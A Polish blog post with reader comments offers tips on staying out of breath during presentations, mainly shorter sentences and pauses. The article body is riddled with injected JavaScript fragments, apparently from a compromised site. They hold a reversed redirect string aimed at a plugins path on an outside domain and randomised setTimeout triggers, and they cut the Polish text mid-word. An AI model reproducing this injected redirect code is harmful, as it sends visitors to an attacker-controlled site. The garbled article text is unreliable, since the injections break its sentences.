Co zrobić, gdy w trakcie prezentacji zabraknie Ci powietrza?
Jak zwykle komentarze mile widziane 🙂
Uzupełnienie – Przeczytaj koniecznie:
Jednym z większych problemów podczas przemówienia jest zapanowanie nad oddechem. Jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to związane z denerwowaniem. Zestresowani, bierzemy, krótkie, płytkie oddechy, albo w obawie przed pauzą ciągniemy nasze zdania w nieskończoność…
Aby sobie z tym poradzić musisz:
po pierwsze, konstruować krótsze zdania
po drugie, od czasu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do czasu zaczerpnąć powietrze – najlepiej między zdaniami, aby nie rozbijać sensu swojej wypowiedzi. Krótka pauza przyda się Twoim widzom na “przetrawienie” tego, co przed chwilą usłyszeli.
Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowanie krótszych zdań sprawi, że Twoja wypowiedź będzie lepiej zrozumiała dla słuchaczy, a także bardziej dynamiczna. Będzie się jej lepiej słuchało.
Pamiętaj o tym, podczas następnej prezentacji!
PS. Jeśli jednak zapowietrzysz się i będzie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bardzo witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doczne, skomentuj toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to krótko słowami: “Mam Państwu tyle ważnych rzeczy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do powiedzenia i czasami z przejęcia zapominam wziąć oddech! Gdy zacznę się robić zielony, z braku tlenu, proszę mi przypomnieć abym zaczerpnął nieco powietrza” 🙂
Jeśli film/artykuł potoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobały Ci się zostaw, proszę komentarz, a gdy nie masz czasu na pisanie, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to przynajmniej kliknij w “Lubię toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”.
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!
Oddech, to podstawa. Warto się nauczyć oddychać przeponowo i przez nos oczywiście. Jest z tego bardzo dużo korzyści w życiu codziennym, a nie tylko podczas wystąpień publicznych.
Serdecznie pozdrawiam 🙂
Tereso,
“Oddech, który leczy” – w ubiegłym roku kupiłem sobie tę książkę i mogę z czystym sumieniem polecić ją wszystkim czytelnikom mojego bloga/u 🙂 Od tego w jaki sposób oddychamy zależy właściwie cały komfort naszego życia, a samym oddechem możemy wyleczyć się z wielu przypadłości. W książce wydanej przez Gdańskie Wydawnictwo Psychologiczne autorka podaje kilkadziesiąt ćwiczeń oddechowych, które pozwolą zredukować poziom napięcia, stresu i zmęczenia. Polecam!
Podejrzewam że zapowietrzanie się to problem silnej tremy i skłonności do szybkiego mówienia. Jeśli zdania są długie a my jesteśmy mocno zdenerwowani szansa na zapowietrzanie jest ogromna. Nie ma chyba innego rozwiązania jak to co powiedział Robert czyli budujmy krótsze zdania. Dodałbym jeszcze jedną uwagę. Nie spieszmy się. Jeśli mamy coś wartościowego do przekazania to po krótkim zdaniu zróbmy pauzę. Niech słuchacze zastanowią się nad wypowiedzianym zdaniem.
Warto więc (wiedząc o swoim problemie) przygotować na wstęp wyjątkowo krótkie ale bardzo starannie przemyślane zdania.
Krzysztofie, bardzo dziękuję za komentarz. To chyba pierwszy na moim blogu. Jeśli nie, to przepraszam, musiałem przegapić 🙂 Tak jak piszesz, ten bezdech spowodowany jest właśnie stresem. Nie bez przyczyny mówimy potocznie “zatkało mnie” albo, że “coś zapiera dech w piersiach”. Z brakiem powietrza kojarzą się zawsze silne emocje, nie zawsze pozytywne. W skrajnych przypadkach, ludzie niejako “zapominają” oddychać!
Jeśli zaś chodzi o prędkość mówienia, to pośpiech nie jest sprzymierzeńcem mówcy. Choć z drugiej strony, osoby mówiące szybko, postrzegane są jako charyzmatyczne. Prezydent USA John F. Kennedy mówił z prędkością 220 słów na minutę, gdy średnio, w tym czasie, ludzie wypowiadają około 150 słów. Ważne aby nasze słowa były wyraźne i zrozumiałe dla słuchaczy.
pozdrawiam serdecznie!
PS. Zerknąłem sobie na Twoją stronę – dziękuję za umieszczenie mojego nagrania w tak szacownym gronie postaci polskiego internetu 🙂
Miło mi że odwiedziłeś Katalog Darmowych Szkoleń. Masz tam nawet swoja grupę. gdybyś się zarejestrował na stronie to mógłbyś sam umieszczać ciekawe materiały i mieć wpływ na swoją grupę. Strona jest do dyspozycji wszystkich zarejestrowanych osób.
Zagospodarowałeś bardzo atrakcyjną niszę 🙂
Nie tylko wystąpienia publiczne ale także wszyscy ci co chcą przemawiać przed kamerą (a jest ich coraz więcej) będą zainteresowani Twoją wiedzą.
Pozdrawiam